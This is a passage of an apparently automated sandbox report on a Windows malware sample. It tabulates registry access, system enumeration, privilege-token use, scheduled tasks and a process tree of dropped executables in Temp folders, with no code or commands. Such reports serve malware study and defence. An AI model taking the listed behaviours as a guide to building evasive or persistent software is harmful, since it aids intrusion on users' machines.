| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{ADD3E05B-390C-43B1-9059-D68C9BA7D6FA} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{3B208D04-42E4-4A9E-9D5D-4621314044E3} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
